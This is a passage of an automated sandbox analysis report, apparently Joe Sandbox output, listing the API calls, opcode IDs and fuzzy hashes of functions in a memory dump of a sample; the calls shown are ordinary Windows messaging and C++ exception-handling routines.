                                                                                                                                                                                                                                                                • API String ID: 3919072728-248832578
                                                                                                                                                                                                                                                                • Opcode ID: 5cd004dac457ffb8d4c3d5a7ec176549c75cc442209eb24f9734c45032314272
                                                                                                                                                                                                                                                                • Instruction ID: 7e2b538765bb29ee2a751e16b0a767484fcd662a9d49b65ea15a23cdf82eecf6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cd004dac457ffb8d4c3d5a7ec176549c75cc442209eb24f9734c45032314272
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9017135200209FBDF295F50CC49EEEBB7BEB95361F044065F90566160CBB19A90AA50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0012C484
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID: 8"(
                                                                                                                                                                                                                                                                • API String ID: 3850602802-1195279328
                                                                                                                                                                                                                                                                • Opcode ID: f4df4aff9bbd5dc5580454c3b03bddab87545e53602010e6795003a07edcf560
                                                                                                                                                                                                                                                                • Instruction ID: a44a7b563e430b5dee3a647fd3e9a6f4d27bdd3fcd83586d212206b461466a09
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4df4aff9bbd5dc5580454c3b03bddab87545e53602010e6795003a07edcf560
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2E086B4650204FFDF14EB50CE4AF9A76A8AB45705F2001A4F6045A1D2DBB1E9159A50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00118C1C: __EH_prolog3.LIBCMT ref: 00118C23
                                                                                                                                                                                                                                                                • GetMessageTime.USER32 ref: 0011FA40
                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 0011FA49
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$H_prolog3Time
                                                                                                                                                                                                                                                                • String ID: ${(
                                                                                                                                                                                                                                                                • API String ID: 3041656633-964378601
                                                                                                                                                                                                                                                                • Opcode ID: 0d15e663122a5d2545e080d86b91708ed0cc0f2aa1046205327ad1657a7ee528
                                                                                                                                                                                                                                                                • Instruction ID: 88119c0b7f0a5538b96caaec87d0e80d77637011943f09fb9390652b7e5720d5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d15e663122a5d2545e080d86b91708ed0cc0f2aa1046205327ad1657a7ee528
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFE08C36C02B118BC3296B30A48D09A7BD0EF513203114D3EE8C283B50EF30E881CA90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0024A4A4
                                                                                                                                                                                                                                                                  • Part of subcall function 0024A3FC: std::exception::exception.LIBCONCRT ref: 0024A409
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0024A4B2
                                                                                                                                                                                                                                                                  • Part of subcall function 0024C450: RaiseException.KERNEL32(?,?,0024A497,?,?,?,?,?,?,?,?,0024A497,?,00280C74,?), ref: 0024C4AF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                • String ID: Unknown exception
                                                                                                                                                                                                                                                                • API String ID: 1586462112-410509341
                                                                                                                                                                                                                                                                • Opcode ID: d59e39bf5ba9e6ccc27b26b951b5b2b51aa6a1f03541414a33962d2c7e74af74
                                                                                                                                                                                                                                                                • Instruction ID: 0ee7879792f6b7ef79a90c2fa3081d74f6ba9cb86168e72e1df4f45413104978
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d59e39bf5ba9e6ccc27b26b951b5b2b51aa6a1f03541414a33962d2c7e74af74
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DD0A738A6020D77CF04FFA4C95585D7B6CEF00700B904060B604D2087E7B5D5258BD1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00118C1C: __EH_prolog3.LIBCMT ref: 00118C23
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00118718
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8H_prolog3Throw
                                                                                                                                                                                                                                                                • String ID: ${($8"(
                                                                                                                                                                                                                                                                • API String ID: 3670251406-2716154285
                                                                                                                                                                                                                                                                • Opcode ID: acb6fe251911bb33ddd781761c1d3517202ebb7a20d85c4b80d38b9c19395d2e
                                                                                                                                                                                                                                                                • Instruction ID: 2a9dab0ae675016b56b6de013ba5f1b99441d75e32a69557513b868a8a865dfa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acb6fe251911bb33ddd781761c1d3517202ebb7a20d85c4b80d38b9c19395d2e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AD0126C673308FACB0CF7A28A4B9E9729D9B11704BB084B4FA14525D2DFB0EF545671
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0011874C
                                                                                                                                                                                                                                                                  • Part of subcall function 0024C450: RaiseException.KERNEL32(?,?,0024A497,?,?,?,?,?,?,?,?,0024A497,?,00280C74,?), ref: 0024C4AF
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00118759
                                                                                                                                                                                                                                                                  • Part of subcall function 0011899F: LocalAlloc.KERNEL32(00000040,?,?,00118768,00000164,00000004, !(,00273990,?,?,?,002738DC), ref: 001189A7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocExceptionException@8H_prolog3LocalRaiseThrow
                                                                                                                                                                                                                                                                • String ID: !(
                                                                                                                                                                                                                                                                • API String ID: 927841988-2116428523
                                                                                                                                                                                                                                                                • Opcode ID: fcc9fa3ce7472e6d698f98bdc5036ffa8ab4ed69884bb2bbf69e1b48f4dd1e1b
                                                                                                                                                                                                                                                                • Instruction ID: cc92d3eae43d7b5258864aa602c41c5ab58198f09fb407a82ebf950fe05a076b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcc9fa3ce7472e6d698f98bdc5036ffa8ab4ed69884bb2bbf69e1b48f4dd1e1b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90D012B49B170CFBDB48FB95CD0FD9EB19CDB10744F504054771056282DBF16B646662
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%